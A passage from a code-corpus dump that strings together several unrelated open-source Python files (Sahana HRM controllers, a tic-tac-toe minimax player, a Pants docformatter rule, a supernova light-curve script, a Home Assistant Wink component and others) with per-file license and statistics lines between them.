field.comment = DIV(DIV(_class="tooltip",
_title="%s|%s" % (
settings.get_org_site_label(),
T("The facility where this position is based."),
#messages.AUTOCOMPLETE_HELP,
)))
#field.comment = S3AddResourceLink(c="org", f="facility",
# vars = dict(child="site_id",
# parent="req"),
# title=T("Add New Site"),
# )
# Hide status field
table.status.writable = table.status.readable = False
# Assume staff only between 16-81
s3db.pr_person.date_of_birth.widget = S3DateWidget(past=972,
future=-192)
elif r.representation == "xls":
# Make it match Import sheets
list_fields = s3db.get_config(tablename, "list_fields")
# Remove "id" as XLS exporter doesn't like this not being first & has complicated skipping routines
try:
list_fields.remove("id")
except ValueError:
pass
# Separate Facility Type from Facility Name
table.site_id.represent = s3db.org_SiteRepresent(show_type = False)
i = 0
for f in list_fields:
i += 1
if f == "site_id":
break
list_fields.insert(i,
(T("Facility Type"),
"person_id$human_resource.site_id$instance_type"))
# Split person_id into first/middle/last
try:
list_fields.remove("person_id")
except ValueError:
pass
list_fields = ["person_id$first_name",
"person_id$middle_name",
"person_id$last_name",
] + list_fields
s3db.configure(tablename,
list_fields = list_fields)
return True
s3.prep = prep
def postp(r, output):
if r.interactive:
if not r.component:
# Set the minimum end_date to the same as the start_date
s3.jquery_ready.append(
'''S3.start_end_date('hrm_human_resource_start_date','hrm_human_resource_end_date')''')
s3_action_buttons(r, deletable=settings.get_hrm_deletable())
if "msg" in settings.modules and \
settings.get_hrm_compose_button() and \
auth.permission.has_permission("update", c="hrm", f="compose"):
# @ToDo: Remove this now that we have it in Events?
s3.actions.append(
{"url": URL(f="compose",
vars = {"human_resource.id": "[id]"}),
"_class": "action-btn send",
"label": str(T("Send Message"))
})
#s3.scripts.append("/%s/static/scripts/jquery.doubleScroll.js" % appname)
#s3.jquery_ready.append('''$('.dataTable_table').doubleScroll()''')
#s3.jquery_ready.append('''$('.dataTables_wrapper').doubleScroll()''')
elif r.representation == "plain":
# Map Popups
output = s3db.hrm_map_popup(r)
return output
s3.postp = postp
return s3_rest_controller("hrm", "human_resource")
# -----------------------------------------------------------------------------
def person():
"""
Person Controller
- used for access to component Tabs, Personal Profile & Imports
- includes components relevant to HRM
"""
return s3db.hrm_person_controller()
# -----------------------------------------------------------------------------
def profile():
"""
Profile Controller
- includes components relevant to HRM
"""
request.args = [str(s3_logged_in_person())]
# Custom Method for Contacts
s3db.set_method("pr", resourcename,
method = "contacts",
action = s3db.pr_Contacts)
if settings.has_module("asset"):
# Assets as component of people
s3db.add_components("pr_person",
asset_asset = "assigned_to_id",
)
group = get_vars.get("group", "staff")
# Configure human resource table
tablename = "hrm_human_resource"
table = s3db[tablename]
table.type.default = 1
# Configure person table
tablename = "pr_person"
table = s3db[tablename]
s3db.configure(tablename,
deletable = False,
)
# Configure for personal mode
s3.crud_strings[tablename].update(
title_display = T("Personal Profile"),
title_update = T("Personal Profile"))
# CRUD pre-process
def prep(r):
if r.interactive and r.method != "import":
if r.component:
if r.component_name == "physical_description":
# Hide all but those details that we want
# Lock all the fields
table = r.component.table
for field in table.fields:
table[field].writable = table[field].readable = False
# Now enable those that we want
table.ethnicity.writable = table.ethnicity.readable = True
table.blood_type.writable = table.blood_type.readable = True
table.medical_conditions.writable = table.medical_conditions.readable = True
table.other_details.writable = table.other_details.readable = True
else:
table = r.table
table.pe_label.readable = table.pe_label.writable = False
table.missing.readable = table.missing.writable = False
table.age_group.readable = table.age_group.writable = False
# Assume volunteers only between 12-81
table.date_of_birth.widget = S3DateWidget(past=972, future=-144)
return True
else:
# Disable non-interactive & import
return False
s3.prep = prep
# CRUD post-process
def postp(r, output):
if r.interactive and r.component:
if r.component_name == "human_resource":
# Set the minimum end_date to the same as the start_date
s3.jquery_ready.append(
'''S3.start_end_date('hrm_human_resource_start_date','hrm_human_resource_end_date')''')
if r.component_name == "experience":
# Set the minimum end_date to the same as the start_date
s3.jquery_ready.append(
'''S3.start_end_date('hrm_experience_start_date','hrm_experience_end_date')''')
return output
s3.postp = postp
output = s3_rest_controller("pr", "person",
rheader = s3db.hrm_rheader,
)
return output
# -----------------------------------------------------------------------------
def hr_search():
"""
Human Resource REST controller
- limited to just search_ac for use in Autocompletes
- allows differential access permissions
"""
# Filter
group = get_vars.get("group", None)
if group == "staff":
s3.filter = FS("human_resource.type") == 1
elif group == "volunteer":
s3.filter = FS("human_resource.type") == 2
s3.prep = lambda r: r.method == "search_ac"
return s3_rest_controller("hrm", "human_resource")
# -----------------------------------------------------------------------------
def person_search():
"""
Person REST controller
- limited to just search_ac for use in Autocompletes
- allows differential access permissions
"""
# Filter
group = get_vars.get("group", None)
if group == "staff":
s3.filter = FS("human_resource.type") == 1
elif group == "volunteer":
s3.filter = FS("human_resource.type") == 2
s3.prep = lambda r: r.method == "search_ac"
return s3_rest_controller("pr", "person")
# =============================================================================
# Teams
# =============================================================================
def group():
"""
Team controller
- uses the group table from PR
"""
return s3db.hrm_group_controller()
# -----------------------------------------------------------------------------
def group_membership():
"""
Membership controller
- uses the group_membership table from PR
"""
# Change Labels & list_fields
s3db.hrm_configure_pr_group_membership()
# Only show Relief Teams
# Do not show system groups
# Only show Staff
table = db.pr_group_membership
gtable = db.pr_group
htable = s3db.hrm_human_resource
s3.filter = (gtable.system == False) & \
(gtable.group_type == 3) & \
(htable.type == 1) & \
(htable.person_id == table.person_id)
def prep(r):
if r.method in ("create", "create.popup", "update", "update.popup"):
# Coming from Profile page?
person_id = get_vars.get("~.person_id", None)
if person_id:
field = table.person_id
field.default = person_id
field.readable = field.writable = False
return True
s3.prep = prep
output = s3_rest_controller("pr", "group_membership",
csv_template="group_membership",
csv_stylesheet=("hrm", "group_membership.xsl"),
)
return output
# =============================================================================
# Jobs
# =============================================================================
def department():
""" Departments Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
if not auth.s3_has_role(ADMIN):
s3.filter = auth.filter_by_root_org(s3db.hrm_department)
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def job_title():
""" Job Titles Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
s3.filter = FS("type").belongs((1, 3))
if not auth.s3_has_role(ADMIN):
s3.filter &= auth.filter_by_root_org(s3db.hrm_job_title)
output = s3_rest_controller()
return output
# =============================================================================
# Skills
# =============================================================================
def skill():
""" Skills Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def skill_type():
""" Skill Types Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def competency_rating():
""" Competency Rating for Skill Types Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def skill_provision():
""" Skill Provisions Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def course():
""" Courses Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
if not auth.s3_has_role(ADMIN):
s3.filter = auth.filter_by_root_org(s3db.hrm_course)
output = s3_rest_controller(rheader=s3db.hrm_rheader)
return output
# -----------------------------------------------------------------------------
def course_certificate():
""" Courses to Certificates Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def certificate():
""" Certificates Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
if settings.get_hrm_filter_certificates() and \
not auth.s3_has_role(ADMIN):
s3.filter = auth.filter_by_root_org(s3db.hrm_certificate)
output = s3_rest_controller(rheader=s3db.hrm_rheader)
return output
# -----------------------------------------------------------------------------
def certificate_skill():
""" Certificates to Skills Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# -----------------------------------------------------------------------------
def training():
""" Training Controller - used for Searching for Participants """
s3.filter = FS("person_id$human_resource.type") == 1
return s3db.hrm_training_controller()
# -----------------------------------------------------------------------------
def training_event():
""" Training Events Controller """
return s3db.hrm_training_event_controller()
# -----------------------------------------------------------------------------
def credential():
""" Credentials Controller """
s3.filter = FS("person_id$human_resource.type") == 1
return s3db.hrm_credential_controller()
# -----------------------------------------------------------------------------
def experience():
""" Experience Controller """
s3.filter = FS("person_id$human_resource.type") == 1
return s3db.hrm_experience_controller()
# -----------------------------------------------------------------------------
def competency():
"""
RESTful CRUD controller used to allow searching for people by Skill
"""
s3.filter = FS("person_id$human_resource.type") == 1
field = s3db.hrm_competency.person_id
field.widget = S3PersonAutocompleteWidget(ajax_filter = "~.human_resource.type=1")
return s3db.hrm_competency_controller()
# =============================================================================
def skill_competencies():
"""
Called by S3OptionsFilter to provide the competency options for a
particular Skill Type
"""
table = s3db.hrm_skill
ttable = s3db.hrm_skill_type
rtable = s3db.hrm_competency_rating
query = (table.id == request.args[0]) & \
(table.skill_type_id == ttable.id) & \
(rtable.skill_type_id == table.skill_type_id)
records = db(query).select(rtable.id,
rtable.name,
orderby=~rtable.priority)
response.headers["Content-Type"] = "application/json"
return records.json()
# =============================================================================
def staff_org_site_json():
"""
Used by the Asset - Assign to Person page
"""
table = s3db.hrm_human_resource
otable = s3db.org_organisation
query = (table.person_id == request.args[0]) & \
(table.organisation_id == otable.id)
records = db(query).select(table.site_id,
otable.id,
otable.name)
response.headers["Content-Type"] = "application/json"
return records.json()
# =============================================================================
def staff_for_site():
"""
Used by the Req/Req/Create page
- note that this returns Person IDs
"""
try:
site_id = request.args[0]
except:
result = current.xml.json_message(False, 400, "No Site provided!")
else:
table = s3db.hrm_human_resource
ptable = db.pr_person
query = (table.site_id == site_id) & \
(table.deleted == False) & \
(table.status == 1) & \
((table.end_date == None) | \
(table.end_date > request.utcnow)) & \
(ptable.id == table.person_id)
rows = db(query).select(ptable.id,
ptable.first_name,
ptable.middle_name,
ptable.last_name,
orderby=ptable.first_name)
result = []
append = result.append
for row in rows:
append({"id" : row.id,
"name" : s3_fullname(row)
})
result = json.dumps(result)
response.headers["Content-Type"] = "application/json"
return result
# =============================================================================
# Salaries
# =============================================================================
def staff_level():
""" Staff Levels Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
def salary_grade():
""" Salary Grade Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# =============================================================================
# Insurance Information
# =============================================================================
def insurance():
""" Insurance Information Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# =============================================================================
# Awards
# =============================================================================
def award_type():
""" Award Type Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
def award():
""" Awards Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# =============================================================================
# Disciplinary Record
# =============================================================================
def disciplinary_type():
""" Disciplinary Type Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
def disciplinary_action():
""" Disciplinary Action Controller """
mode = session.s3.hrm.mode
def prep(r):
if mode is not None:
auth.permission.fail()
return True
s3.prep = prep
output = s3_rest_controller()
return output
# =============================================================================
# Messaging
# =============================================================================
def compose():
""" Send message to people/teams """
return s3db.hrm_compose()
# END =========================================================================
|
mit
| -650,041,428,619,606,000
| 32.312581
| 111
| 0.455108
| false
| 4.657117
| true
| false
| false
|
cloudnull/genastack_roles
|
genastack_roles/heat_engine/__init__.py
|
1
|
1045
|
# =============================================================================
# Copyright [2013] [Kevin Carter]
# License Information :
# This software has no warranty, it is provided 'as is'. It is your
# responsibility to validate the behavior of the routines and its accuracy
# using the code provided. Consult the GNU General Public license for further
# details (see GNU General Public License).
# http://www.gnu.org/licenses/gpl.html
# =============================================================================
BUILD_DATA = {
'heat_engine': {
'help': 'Install heat-engine from upstream',
'required': [
'python',
'heat',
'heat_client'
],
'init_script': [
{
'help': 'Start and stop heat-engine on boot',
'init_path': '/etc/init.d',
'name': 'heat-engine',
'chuid': 'heat',
'chdir': '/var/lib/heat',
'program': 'heat-engine'
}
]
}
}
|
gpl-3.0
| -6,973,453,614,583,198,000
| 33.833333
| 79
| 0.449761
| false
| 4.644444
| false
| false
| false
|
anuragxel/ultimate-tic-tac-toe
|
xxx.py
|
1
|
9042
|
#!/usr/bin/python
#
# Negamax variant of minmax
#
# This program is for demonstration purposes, and contains ample
# opportunities for speed and efficiency improvements.
#
# Also, a minmax tree is not the best way to program a tic-tac-toe
# player.
#
# This software is hereby granted to the Public Domain
#
import sys,os
import random
import numpy as np
import json
# from_file=np.genfromtxt("foo.csv",delimiter=",")
# all_state=np.array(from_file).tolist()
# print states
# for i in from_file:
# all_state.append(i)
INFINITY=99999999
def numStr(n):
if n == INFINITY: return "+INFINITY"
elif n == -INFINITY: return "-INFINITY"
return str(n)
def write_to_file():
global states
global f
json.dump(states,f)
f.close()
#print states
# final_add = []
# # print states
# # print all_state
# print to_print
# for e in all_state:
# if e not in final_add:
# final_add.append(e)
# np.savetxt("foo.csv",final_add,delimiter=",")
#-------------------------------------------------------------------
class MinMax(object):
def __init__(self, maxdepth=INFINITY):
self.bestmove = -1
self.maxdepth = maxdepth
def _buildtree_r(self, playboard, curplayer, depth):
"""Recursively build the minmax tree."""
# figure out the value of the board:
if depth > self.maxdepth: return 0 # who knows what the future holds
if curplayer == Board.X:
otherplayer = Board.O
else:
otherplayer = Board.X
winner = playboard.getWinner()
if winner == curplayer:
return INFINITY
elif winner == otherplayer:
return -INFINITY
elif playboard.full():
return 0 # tie game
# get a list of possible moves
movelist = playboard.getCandidateMoves()
alpha = -INFINITY
# for all the moves, recursively rate the subtrees, and
# keep all the results along with the best move:
salist = []
for i in movelist:
# make a copy of the board to mess with
board2 = playboard.copy()
board2.move(curplayer, i) # make the speculative move
subalpha = -self._buildtree_r(board2, otherplayer, depth+1)
if alpha < subalpha:
alpha = subalpha;
# keep a parallel array to the movelist that shows all the
# subtree values--we'll chose at random one of the best for
# our actual move:
if depth == 0: salist.append(subalpha)
# if we're at depth 0 and we've explored all the subtrees,
# it's time to look at the list of moves, gather the ones
# with the best values, and then choose one at random
# as our "best move" to actually really play:
if depth == 0:
candidate = []
board_state=''
for i in range(len(salist)):
if salist[i] == alpha:
candidate.append(movelist[i])
#print("Best score: %s Candidate moves: %s" % (numStr(alpha), candidate))
self.bestmove = random.choice(candidate)
# all_state.append(self.bestmove)
board_state=playboard.get_board_values()
states[board_state]=self.bestmove
return alpha
def buildtree(self, board, curplayer):
self.bestmove = -1
alpha = self._buildtree_r(board, curplayer, 0)
return self.bestmove
#-------------------------------------------------------------------
class Board(list):
"""Holds a complete board in self, row-major order."""
NONE = 0
X = 1
O = 2
def __init__(self):
for i in range(9): self.append(Board.NONE)
def copy(self):
"""Clone a board."""
b = Board()
for i in range(9):
b[i] = self[i]
return b
def move(self, color, pos):
"""Fill a position on the board."""
self[pos] = color
def getCandidateMoves(self):
"""Get a list of free moves."""
clist = []
for i in range(9):
if self[i] == Board.NONE:
clist.append(i)
return clist
def full(self):
"""Returns true if the board is full."""
for i in range(9):
if self[i] == Board.NONE:
return False
return True
def _check(self, a, b, c):
if self[a] == self[b] and self[a] == self[c] and self[a] != Board.NONE:
return self[a]
return Board.NONE
def getWinner(self):
"""Figure out who the winner is, if any."""
winner = self._check(0,1,2)
if winner != Board.NONE: return winner
winner = self._check(3,4,5)
if winner != Board.NONE: return winner
winner = self._check(6,7,8)
if winner != Board.NONE: return winner
winner = self._check(0,3,6)
if winner != Board.NONE: return winner
winner = self._check(1,4,7)
if winner != Board.NONE: return winner
winner = self._check(2,5,8)
if winner != Board.NONE: return winner
winner = self._check(0,4,8)
if winner != Board.NONE: return winner
winner = self._check(2,4,6)
if winner != Board.NONE: return winner
return Board.NONE
def get_board_values(self):
r=''
for i in range(9):
if self[i] == Board.NONE:
#r += '%d' % i
r = r+ '-'
elif self[i] == Board.X:
r = r + 'x'
elif self[i] == Board.O:
r = r+ 'o'
# if i == 2:
# r += '| 0 1 2\n%s\n' % blank
# if i == 5:
# r += '| 3 4 5\n%s\n' % blank
# if i == 8:
# r += '| 6 7 8\n%s\n' % blank
return r
def __str__(self):
""" Pretty-print the board."""
blank = '+-+-+-+'
r = blank + '\n'
for i in range(9):
r += '|'
if self[i] == Board.NONE:
#r += '%d' % i
r += ' '
elif self[i] == Board.X:
r += 'X'
elif self[i] == Board.O:
r += 'O'
if i == 2:
r += '| 0 1 2\n%s\n' % blank
if i == 5:
r += '| 3 4 5\n%s\n' % blank
if i == 8:
r += '| 6 7 8\n%s\n' % blank
return r
#-------------------------------------------------------------------
# MAIN:
# make the real board we'll be using
def main():
global f
global states
f = open('foo.csv','r+')
if os.stat("foo.csv").st_size != 0:
states = json.load(f)
f.close()
open('foo.csv', 'w').close()
f = open('foo.csv','rw+')
else:
states = {}
board = Board()
# attach it to a MinMax tree generator/evaluator, max depth 6:
mm = MinMax(6)
#sys.stdout.write("Who's first? (H)uman or (C)omputer? ")
#sys.stdout.flush()
#first = sys.stdin.readline().strip().lower()[0]
first = random.choice(['h','c'])
if first == 'h':
curplayer = Board.O # human
else:
curplayer = Board.X # computer
done = False
#sys.stdout.write("%s\n" % board)
while not done:
if board.full(): #DRAW
done = True
# print all_state
write_to_file()
#sys.stdout.write("Tie game!\n")
continue
if curplayer == Board.X:
#sys.stdout.write("Computer is thinking...\n")
# run the minmax tree for the current board
#if board.get_board_values() in states:
if board.get_board_values() in states and random.choice([True,True,False,True,False]):
move = states[board.get_board_values()]
else:
move = mm.buildtree(board, curplayer)
#sys.stdout.write("Computer's move: %s\n" % move)
else:
badMove = True
while badMove:
#sys.stdout.write("Enter a move: ");
sys.stdout.flush();
#move = int(sys.stdin.readline())
move = random.choice([0,1,2,3,4,5,6,7,8])
badMove = move < 0 or move > 8 or board[move] != Board.NONE
if move >= 0:
board.move(curplayer, move)
#sys.stdout.write("%s\n" % board)
winner = board.getWinner()
if winner == Board.X:
write_to_file()
# sys.stdout.write("X wins!\n")
done = True
elif winner == Board.O:
write_to_file()
# sys.stdout.write("O wins!\n")
done = True
# switch to other player:
if curplayer == Board.X:
curplayer = Board.O
else:
curplayer = Board.X
if __name__ == "__main__":
iterations = 5000
while iterations:
main()
iterations -= 1
|
mit
| 3,349,314,645,422,047,000
| 27.613924
| 98
| 0.496572
| false
| 3.662211
| false
| false
| false
|
pyfidelity/rest-seed
|
backend/backrest/models/content.py
|
1
|
1796
|
from sqlalchemy import Column
from sqlalchemy import DateTime
from sqlalchemy import Integer
from sqlalchemy import String
from sqlalchemy import Unicode
from sqlalchemy import UnicodeText
from sqlalchemy.util import classproperty
from ..utils import utcnow
from .base import Base
def get_content(id):
""" Return content instance with the given id (or `None`). """
return Content.query.filter_by(id=id).first()
class Content(Base):
""" Base class for all content. Includes basic features such
as ownership, time stamps for modification and creation. """
@classproperty
def __mapper_args__(cls):
return dict(
polymorphic_on='type',
polymorphic_identity=cls.__name__.lower(),
with_polymorphic='*')
id = Column(Integer(), primary_key=True)
type = Column(String(30), nullable=False)
owner = Column(Unicode())
title = Column(Unicode())
description = Column(UnicodeText())
creation_date = Column(DateTime(timezone=True), nullable=False, default=utcnow)
modification_date = Column(DateTime(timezone=True), nullable=False, default=utcnow)
def __init__(self, **data):
self.add(**data)
def update(self, touch=True, **data):
""" Iterate over all columns and set values from data. """
super(Content, self).update(**data)
if touch and 'modification_date' not in data:
self.modification_date = utcnow()
def __json__(self, request):
return dict(id=self.id, title=self.title,
description=self.description,
creation_date=self.creation_date,
modification_date=self.modification_date)
def __eq__(self, other):
return isinstance(other, Content) and self.id == other.id
|
bsd-2-clause
| -3,919,537,068,281,949,700
| 32.886792
| 87
| 0.655902
| false
| 4.348668
| false
| false
| false
|
tdyas/pants
|
src/python/pants/backend/python/lint/docformatter/rules.py
|
1
|
5663
|
# Copyright 2020 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from dataclasses import dataclass
from typing import Tuple
from pants.backend.python.lint.docformatter.subsystem import Docformatter
from pants.backend.python.lint.python_fmt import PythonFmtFieldSets
from pants.backend.python.rules import download_pex_bin, pex
from pants.backend.python.rules.pex import (
Pex,
PexInterpreterConstraints,
PexRequest,
PexRequirements,
)
from pants.backend.python.subsystems import python_native_code, subprocess_environment
from pants.backend.python.subsystems.subprocess_environment import SubprocessEncodingEnvironment
from pants.backend.python.target_types import PythonSources
from pants.core.goals.fmt import FmtFieldSet, FmtFieldSets, FmtResult
from pants.core.goals.lint import LinterFieldSets, LintResult
from pants.core.util_rules import determine_source_files, strip_source_roots
from pants.core.util_rules.determine_source_files import (
AllSourceFilesRequest,
SourceFiles,
SpecifiedSourceFilesRequest,
)
from pants.engine.fs import Digest, MergeDigests
from pants.engine.process import FallibleProcessResult, Process, ProcessResult
from pants.engine.rules import SubsystemRule, named_rule, rule
from pants.engine.selectors import Get
from pants.engine.unions import UnionRule
from pants.python.python_setup import PythonSetup
from pants.util.strutil import pluralize
@dataclass(frozen=True)
class DocformatterFieldSet(FmtFieldSet):
required_fields = (PythonSources,)
sources: PythonSources
class DocformatterFieldSets(FmtFieldSets):
field_set_type = DocformatterFieldSet
@dataclass(frozen=True)
class SetupRequest:
field_sets: DocformatterFieldSets
check_only: bool
@dataclass(frozen=True)
class Setup:
process: Process
original_digest: Digest
def generate_args(
*, specified_source_files: SourceFiles, docformatter: Docformatter, check_only: bool,
) -> Tuple[str, ...]:
return (
"--check" if check_only else "--in-place",
*docformatter.options.args,
*sorted(specified_source_files.snapshot.files),
)
@rule
async def setup(
request: SetupRequest,
docformatter: Docformatter,
python_setup: PythonSetup,
subprocess_encoding_environment: SubprocessEncodingEnvironment,
) -> Setup:
requirements_pex = await Get[Pex](
PexRequest(
output_filename="docformatter.pex",
requirements=PexRequirements(docformatter.get_requirement_specs()),
interpreter_constraints=PexInterpreterConstraints(
docformatter.default_interpreter_constraints
),
entry_point=docformatter.get_entry_point(),
)
)
if request.field_sets.prior_formatter_result is None:
all_source_files = await Get[SourceFiles](
AllSourceFilesRequest(field_set.sources for field_set in request.field_sets)
)
all_source_files_snapshot = all_source_files.snapshot
else:
all_source_files_snapshot = request.field_sets.prior_formatter_result
specified_source_files = await Get[SourceFiles](
SpecifiedSourceFilesRequest(
(field_set.sources, field_set.origin) for field_set in request.field_sets
)
)
input_digest = await Get[Digest](
MergeDigests((all_source_files_snapshot.digest, requirements_pex.digest))
)
address_references = ", ".join(
sorted(field_set.address.reference() for field_set in request.field_sets)
)
process = requirements_pex.create_process(
python_setup=python_setup,
subprocess_encoding_environment=subprocess_encoding_environment,
pex_path="./docformatter.pex",
pex_args=generate_args(
specified_source_files=specified_source_files,
docformatter=docformatter,
check_only=request.check_only,
),
input_digest=input_digest,
output_files=all_source_files_snapshot.files,
description=(
f"Run Docformatter on {pluralize(len(request.field_sets), 'target')}: "
f"{address_references}."
),
)
return Setup(process, original_digest=all_source_files_snapshot.digest)
@named_rule(desc="Format Python docstrings with docformatter")
async def docformatter_fmt(
field_sets: DocformatterFieldSets, docformatter: Docformatter
) -> FmtResult:
if docformatter.options.skip:
return FmtResult.noop()
setup = await Get[Setup](SetupRequest(field_sets, check_only=False))
result = await Get[ProcessResult](Process, setup.process)
return FmtResult.from_process_result(result, original_digest=setup.original_digest)
@named_rule(desc="Lint Python docstrings with docformatter")
async def docformatter_lint(
field_sets: DocformatterFieldSets, docformatter: Docformatter
) -> LintResult:
if docformatter.options.skip:
return LintResult.noop()
setup = await Get[Setup](SetupRequest(field_sets, check_only=True))
result = await Get[FallibleProcessResult](Process, setup.process)
return LintResult.from_fallible_process_result(result)
def rules():
return [
setup,
docformatter_fmt,
docformatter_lint,
SubsystemRule(Docformatter),
UnionRule(PythonFmtFieldSets, DocformatterFieldSets),
UnionRule(LinterFieldSets, DocformatterFieldSets),
*download_pex_bin.rules(),
*determine_source_files.rules(),
*pex.rules(),
*python_native_code.rules(),
*strip_source_roots.rules(),
*subprocess_environment.rules(),
]
|
apache-2.0
| -8,875,962,643,641,155,000
| 33.530488
| 96
| 0.719054
| false
| 3.927184
| false
| false
| false
|
tayebzaidi/snova_analysis
|
Miscellaneous/supernova_readin_plot.py
|
1
|
2998
|
import matplotlib.pyplot as plt
import numpy as np
import peakfinding
import smoothing
import plotter
import readin
import sys
import os
if __name__== '__main__':
#lcurve = readin.readin_aavso('aavsodata_sscyg.txt')
#mjd = lcurve.jd - 240000.5
#mag = lcurve.magnitude
#maxtab, mintab = peakfinding.peakdet(mag,1.2 , mjd)
#smoothed = smoothing.UnivariateSplinefit(mjd, mag,5)
#maxtab, mintab = peakfinding.peakdet(smoothed, 1, mjd)
#data = readin.readin_SNANA('CFA4_2006ct.dat')
#plotter.plot1D(mjd, smoothed, 'blue', 0,1)
#plotter.plot1D(mjd, mag, 'red', 1,1)
#plotter.Show()
#data = readin.readin_SNrest()
#maxp, minp = peakfinding.peakdet(data.mag, 1, data.phase)
#interp = smoothing.Interpolate1D(data.phase, data.mag)
path = "/Users/zaidi/Documents/REU/restframe/"
Mvbdata = []
delM15data = []
err_data = []
for filename in os.listdir(path):
current_file = os.path.join(path, filename)
data= readin.readin_SNrest(filename)
try:
interp = smoothing.Interpolate1D(data.phase, data.mag)
maxp, minp = peakfinding.peakdet(data.mag, 0.55, data.phase)
Mvb = smoothing.MvB(data.mag, data.phase, minp)
delM15 = smoothing.delM15(interp, data.phase, minp)
if len(minp) != 0 and len(minp) < 3:
Mvbdata.append(Mvb)
delM15data.append(delM15)
err_data.append(data.err)
'''
fig = plt.figure(figsize=(6,6))
ax = fig.add_subplot(1,1,1)
ax.plot(data.phase, data.mag, 'k.', [minp[0][0]+15], interp(minp[0][0]+15), 'bo')
ax.axvline(minp[0][0])
ax.axvline(minp[0][0]+15)
ax.axhline(interp(minp[0][0]+15))
ax.axhline(minp[0][1])
plt.savefig(filename + '.png')
'''
except ValueError:
print filename, data
print data.mag, data.phase
print (len(data.mag), len(data.phase))
'''
print interp(15)
fig = plt.figure(figsize=(6,6))
ax = fig.add_subplot(1,1,1)
ax.plot(data.phase, data.mag, 'k.', [15.], interp(15), 'bo')
plt.ion()
plt.show(fig)
'''
#sys.exit(-1)
'''
ax = plotter.plot1D(data.phase, interp,'blue',1, lnstyle = '-')
try:
plotter.plot1DScatter(minp[:,0], minp[:,1], 'red', 1)
except IndexError:
pass
plotter.Show()
plotter.Clear()
a = raw_input("Press Enter to continue...")
if a == "q":
break
'''
fig2 = plt.figure(2)
ax = fig2.add_subplot(1,1,1)
ax.scatter(Mvbdata, delM15data,)
ax2 = fig2.add_subplot(3,2,1)
ax2.hist(err_data, 5)
plt.show(fig2)
#plt.plot(data.phase, data.mag, linestyle = ':')
#plt.gca().invert_yaxis()
#plt.show()
|
gpl-3.0
| -1,806,584,690,072,135,200
| 32.685393
| 97
| 0.53936
| false
| 3.062308
| false
| false
| false
|
badele/home-assistant
|
homeassistant/components/wink.py
|
1
|
3001
|
"""
homeassistant.components.wink
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Connects to a Wink hub and loads relevant components to control its devices.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/wink/
"""
import logging
from homeassistant import bootstrap
from homeassistant.loader import get_component
from homeassistant.helpers import validate_config
from homeassistant.helpers.entity import ToggleEntity
from homeassistant.const import (
EVENT_PLATFORM_DISCOVERED, CONF_ACCESS_TOKEN,
ATTR_SERVICE, ATTR_DISCOVERED, ATTR_FRIENDLY_NAME)
DOMAIN = "wink"
DEPENDENCIES = []
REQUIREMENTS = ['https://github.com/balloob/python-wink/archive/'
'42fdcfa721b1bc583688e3592d8427f4c13ba6d9.zip'
'#python-wink==0.2']
DISCOVER_LIGHTS = "wink.lights"
DISCOVER_SWITCHES = "wink.switches"
DISCOVER_SENSORS = "wink.sensors"
DISCOVER_LOCKS = "wink.locks"
def setup(hass, config):
""" Sets up the Wink component. """
logger = logging.getLogger(__name__)
if not validate_config(config, {DOMAIN: [CONF_ACCESS_TOKEN]}, logger):
return False
import pywink
pywink.set_bearer_token(config[DOMAIN][CONF_ACCESS_TOKEN])
# Load components for the devices in the Wink that we support
for component_name, func_exists, discovery_type in (
('light', pywink.get_bulbs, DISCOVER_LIGHTS),
('switch', pywink.get_switches, DISCOVER_SWITCHES),
('sensor', pywink.get_sensors, DISCOVER_SENSORS),
('lock', pywink.get_locks, DISCOVER_LOCKS)):
if func_exists():
component = get_component(component_name)
# Ensure component is loaded
bootstrap.setup_component(hass, component.DOMAIN, config)
# Fire discovery event
hass.bus.fire(EVENT_PLATFORM_DISCOVERED, {
ATTR_SERVICE: discovery_type,
ATTR_DISCOVERED: {}
})
return True
class WinkToggleDevice(ToggleEntity):
""" Represents a Wink toogle (switch) device. """
def __init__(self, wink):
self.wink = wink
@property
def unique_id(self):
""" Returns the id of this Wink switch. """
return "{}.{}".format(self.__class__, self.wink.deviceId())
@property
def name(self):
""" Returns the name of the light if any. """
return self.wink.name()
@property
def is_on(self):
""" True if light is on. """
